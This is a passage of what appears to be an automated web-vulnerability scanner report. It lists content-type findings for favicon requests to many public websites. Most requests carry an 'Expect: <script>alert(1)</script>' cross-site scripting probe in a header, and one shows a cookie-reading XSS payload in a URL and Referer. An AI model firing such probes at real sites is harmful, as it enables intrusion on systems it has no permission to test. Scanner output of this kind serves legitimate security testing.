Connection: keep-alive
Last-Modified: Wed, 25 Feb 2009 16:24:40 GMT
ETag: "1c7e391-13e-463c0ac27c200"
Accept-Ranges: bytes
Content-Length: 318

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...

18.88. http://www.naturallycurly.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.naturallycurly.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.naturallycurly.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 10 Aug 2010 15:20:04 GMT
ETag: "204ce82-1436-48d79aadcd100"
Accept-Ranges: bytes
Content-Length: 5174
Content-Type: text/plain
X-Pad: avoid browser bug
Date: Fri, 01 Apr 2011 15:20:29 GMT
Connection: close

..............h...&...00..............(....... ...........@...................................................S....b...i...T...9...`...........a...4...A......t....D...V..D....q...H...c.......K..h....O
...[SNIP]...

18.89. http://www.newretirement.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.newretirement.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.90. http://www.news-medical.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.news-medical.net
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.91. http://www.nwf.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nwf.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.92. http://www.owners.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.owners.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.93. http://www.pennystockalley.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pennystockalley.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pennystockalley.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx admin
Date: Fri, 01 Apr 2011 15:24:39 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 45

The requested file favicon.ico was not found.

18.94. http://www.personalizationmall.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.personalizationmall.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.95. http://www.printfree.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.printfree.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.96. http://www.puma.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.puma.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.puma.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.31 Apache/2.0.47
Last-Modified: Tue, 29 Jun 2010 13:20:12 GMT
ETag: "8b932-47e-18d9db00"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain
Cache-Control: max-age=86400
Expires: Sat, 02 Apr 2011 17:10:18 GMT
Date: Fri, 01 Apr 2011 17:10:18 GMT
Connection: close

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

18.97. http://www.rcuniverse.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.rcuniverse.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.98. http://www.redrobin.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.redrobin.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.99. http://www.rk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.rk.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rk.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Zeus/4.3
Date: Fri, 01 Apr 2011 15:35:38 GMT
Content-Type: text/plain
Content-Length: 1406
Accept-Ranges: bytes
Last-Modified: Mon, 15 Sep 2008 22:34:59 GMT

..............h.......(....... .......................................-10............z..............Zww.p...GWW.........p}}.cnn.Ywx.m...y.......{...}...MZ[.....frs.r~.z...0CE.->@.....y...\oq.Tdf.t.
...[SNIP]...

18.100. http://www.roirocket.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.roirocket.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.101. http://www.rubytuesday.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.rubytuesday.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.102. http://www.sanityswitch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sanityswitch.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.103. http://www.shaadi.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.shaadi.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shaadi.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 01 Mar 2011 11:45:54 GMT
ETag: "4e08b5-57e-49d6a56ba8080"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=ISO-8859-1
Date: Fri, 01 Apr 2011 17:10:08 GMT
Connection: close

..............h.......(....... .......................................NH..................3...VQ..,&..0+..3-..UP..:4..VP..sn..........|..........rn..+&..............VQ..,&..........)%................
...[SNIP]...

18.104. http://www.soap.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.soap.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.105. http://www.southwestvacations.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.southwestvacations.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:18:14 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

18.106. http://www.starbucksstore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.starbucksstore.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.107. http://www.strefa.pl/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.strefa.pl
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.strefa.pl
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:48:56 GMT
Server: INPL 2.1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 35

Sorry can't allow you access today"

18.108. http://www.sulekha.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sulekha.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.109. http://www.syracuse.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.syracuse.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.syracuse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 18 Sep 2007 17:53:05 GMT
ETag: "10860a-47e-43a6c97d46240"
Accept-Ranges: bytes
Content-Length: 1150
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=1
Expires: Fri, 01 Apr 2011 15:44:34 GMT
Date: Fri, 01 Apr 2011 15:44:33 GMT
Connection: close

............ .h.......(....... ..... ...........................................R...R...R...R...R...R...R...R...........................RC..R...R...R...R...R...R...R...R...R...R...RC..............RC..
...[SNIP]...

18.110. http://www.tennis-warehouse.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tennis-warehouse.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

18.111. http://www.theage.com.au/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.theage.com.au
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.theage.com.au
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 15 Feb 2011 03:11:34 GMT
ETag: "1e73ed6-a6dc-858d0580"
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Type: text/plain; charset=UTF-8
Date: Fri, 01 Apr 2011 16:07:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42716

............ ..`..V...00.... .h&..,a.. .... .(............. .. ............ .h...t....PNG
.
...IHDR.............\r.f.. .IDATx.....]E..g{.M $@.-.....HUA...."?@......P....*...K..J ....%!$..M.%..~.}..
...[SNIP]...

18.112. http://www.tressugar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tressugar.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tressugar.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web019-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-Type: image/gif
Server: lighttpd/1.4.26
Content-Length: 359
Date: Fri, 01 Apr 2011 17:04:14 GMT
Connection: close

.PNG
.
...IHDR................a....gAMA.....OX2....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.%..u.M9 ..\...x....b'r....@.....q....k.#...<@.9.. ....P...r.H..4q.a.P....... 0..%N.0z...@,...;@.
...[SNIP]...

18.113. http://www.tstickets.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tstickets.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Fri, 01 Apr 2011 16:21:29 GMT
Connection: close
Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

18.114. http://www.venus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.venus.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.115. http://www.w3i.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.w3i.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.116. http://www.web.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.web.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.117. http://www.williamsauction.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.williamsauction.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.118. http://www.wlky.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wlky.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wlky.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 12 Nov 2008 20:27:38 GMT
ETag: "9081c1-47e-d3bc0280"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain
Cache-Control: max-age=3550
Expires: Fri, 01 Apr 2011 17:11:14 GMT
Date: Fri, 01 Apr 2011 16:12:04 GMT
Connection: close

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

18.119. http://www.worldwidelearn.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.worldwidelearn.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worldwidelearn.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 30 Sep 2010 07:29:35 GMT
ETag: "1d9549-47e-491750a3095c0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: public
Content-Type: text/plain; charset=UTF-8
Date: Fri, 01 Apr 2011 16:04:44 GMT
Connection: close

............ .h.......(....... ..... ...................................I...C...C...C...C...I...C...C...C...C...I...C...............C...C...I...@..x9..s7..|;...E..=..u8..v8...>...H...C.......C...C...
...[SNIP]...

18.120. http://www.yellowusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.yellowusa.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.121. http://www.yourdegree.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.yourdegree.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

19. Content type is not specified previous
There are 18 instances of this issue:

http://82.cim.meebo.com/cmd/tc
http://suggest.infospace.com/QuerySuggest/SuggestServlet
http://suggest.infospace.com/favicon.ico
http://webiq005.webiqonline.com/WebIQ/DataServer/HandlePageTag.srf
http://www.adleaf.com/favicon.ico
http://www.billoreilly.com/favicon.ico
http://www.cableone.net/favicon.ico
http://www.fender.com/favicon.ico
http://www.freelocaljob.com/favicon.ico
http://www.kraftbrands.com/favicon.ico
http://www.liasophia.com/favicon.ico
http://www.nicusa.com/favicon.ico
http://www.peopletopeople.com/favicon.ico
http://www.shtyle.fm/favicon.ico
http://www.smartauction.biz/favicon.ico
http://www.solow.com/favicon.ico
http://www.tangowire.com/favicon.ico
http://www.theupperfloor.com/favicon.ico

19.1. http://82.cim.meebo.com/cmd/tc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://82.cim.meebo.com
Path:	/cmd/tc

Request

POST /cmd/tc HTTP/1.1
Host: 82.cim.meebo.com
Proxy-Connection: keep-alive
Referer: http://82.cim.meebo.com/cim/postMessageReceiver_v88_cim_9_4_6.php?n=aeriagames
Content-Length: 47
Cache-Control: max-age=0
Origin: http://82.cim.meebo.com
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=15a6c83c109b781d8bb4; tcookie=267e663c46bf3f71bb6e%26true%26AA%3D1%26AB%3D5%26AD%3D1%26AF%3D1%26AH%3D5%26AI%3D5%26AJ%3D1%26AK%3D1%26AL%3D5%26AM%3D5%26AN%3D5%26AQ%3D1%26AR%3D5%26AS%3D5%26AT%3D1%26AU%3D1%26ic17%3D1%26ic22%3D1%26ic16%3D1%26ic12%3D1%26ic24%3D1%26ic10%3D1%26ac17%3D1%26ac14%3D1%26ac10%3D1%26pc2%3D1%26pc1%3D1%26ac2%3D1%26ic3%3D1%26ic2%3D1%26ic6%3D1%26ic5%3D1%26ic19%3D1%26ac16%3D1%26ac12%3D1%26pc4%3D1%26ic9%3D1%26ac5%3D1%26ic1%3D1%26ac8%3D1%26AP%3D5

tcookie=267e663c46bf3f71bb6e&partner=aeriagames

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 01 Apr 2011 18:17:19 GMT
Connection: keep-alive
Content-Length: 163

{"stat": "ok", "data": {"tcookie": "267e663c46bf3f71bb6e", "categories": {"ac3": "1", "ac15": "1", "ac7": "1", "ic18": "1", "ac1": "1", "ic11": "1", "ac18": "1"}}}

19.2. http://suggest.infospace.com/QuerySuggest/SuggestServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://suggest.infospace.com
Path:	/QuerySuggest/SuggestServlet

Request

GET /QuerySuggest/SuggestServlet?prefix=site%3Axs&reqID=JscriptId1301677023385 HTTP/1.1
Host: suggest.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 57
Date: Fri, 01 Apr 2011 16:57:25 GMT
Connection: close

iSuggest.PopulateResults(null, "JscriptId1301677023385");

19.3. http://suggest.infospace.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://suggest.infospace.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: suggest.infospace.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"21630-1216684872000"
Last-Modified: Tue, 22 Jul 2008 00:01:12 GMT
Content-Length: 21630
Date: Fri, 01 Apr 2011 18:15:45 GMT
Connection: close

.... .........(...............h...............h...&... ...........
.. ..........v.. ..............00......h...."..00...........)..00...........7..(....... .........................................
...[SNIP]...

19.4. http://webiq005.webiqonline.com/WebIQ/DataServer/HandlePageTag.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webiq005.webiqonline.com
Path:	/WebIQ/DataServer/HandlePageTag.srf

Request

GET /WebIQ/DataServer/HandlePageTag.srf?U=http%3A%2F%2Fwww.viagra.com%2Ffavicon.ico%3F92bef'-alert(document.cookie)-'af112dd110f%3D1&T=404%20File%20Not%20Found%20-%20VIAGRA%C2%AE%20(sildenafil%20citrate)&ver=1&S=1301678926505 HTTP/1.1
Host: webiq005.webiqonline.com
Proxy-Connection: keep-alive
Referer: http://www.viagra.com/favicon.ico?92bef'-alert(document.cookie)-'af112dd110f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.webiqonline.com/w3c/p3p.xml", CP="NON DSP COR CURa DEVi PSAa OUR UNRi STP DEM STA"
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:28:08 GMT
Connection: close

<html><head><title>Bad Request</title></head><body>Bad Request</body></html>

19.5. http://www.adleaf.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adleaf.com
Path:	/favicon.ico

Request

Response

19.6. http://www.billoreilly.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.billoreilly.com
Path:	/favicon.ico

Request

Response

19.7. http://www.cableone.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cableone.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cableone.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Fri, 01 Apr 2011 16:15:23 GMT
Server: Microsoft-IIS/6.0
FrontEnd: 1
MicrosoftSharePointTeamServices: 12.0.0.6514
X-Powered-By: ASP.NET
Exires: Thu, 17 Mar 2011 16:15:23 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

19.8. http://www.fender.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fender.com
Path:	/favicon.ico

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>
...[SNIP]...

19.9. http://www.freelocaljob.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freelocaljob.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freelocaljob.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Object Not Found
Server: nginx/0.7.67
Date: Fri, 01 Apr 2011 15:53:54 GMT
Connection: keep-alive
Content-Length: 3040
X-Varnish: 1400557603
Age: 0
Via: 1.1 varnish

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Heroku | No such app</title>
<style type='text/css'>
body {

...[SNIP]...

19.10. http://www.kraftbrands.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kraftbrands.com
Path:	/favicon.ico

Request

Response

19.11. http://www.liasophia.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.liasophia.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.liasophia.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 188

<html><head><title>Request Rejected</title></head><body>The requested URL was rejected. Please consult with your administrator.<br><br>Your support ID is: 3708071964344095627</body></html>

19.12. http://www.nicusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nicusa.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nicusa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Fri, 01 Apr 2011 15:42:28 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6318
X-Powered-By: ASP.NET
Exires: Thu, 17 Mar 2011 15:42:28 GMT
Cache-Control: private,max-age=0
Content-Length: 653
Public-Extension: http://schemas.microsoft.com/repl-2



<html>
<head>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
   <meta HTTP-EQUIV="Expires" content="0" />
   <noscri
...[SNIP]...

19.13. http://www.peopletopeople.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peopletopeople.com
Path:	/favicon.ico

Request

Response

19.14. http://www.shtyle.fm/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shtyle.fm
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shtyle.fm
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.6.31
Date: Fri, 01 Apr 2011 16:04:26 GMT
Connection: keep-alive
ETag: W/"1406-1243530609000"
Last-Modified: Thu, 28 May 2009 17:10:09 GMT
Content-Length: 1406
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

..............h.......(....... .................................d...i...r..3u.>>....f...o.$Gz.0]....j...w...w.55..FF..<m..AA..A|..gf..oo..rs..I...J...Q...R...^...d...f...s.............................
...[SNIP]...

19.15. http://www.smartauction.biz/favicon.ico previous next

Summary

Severity:	Information
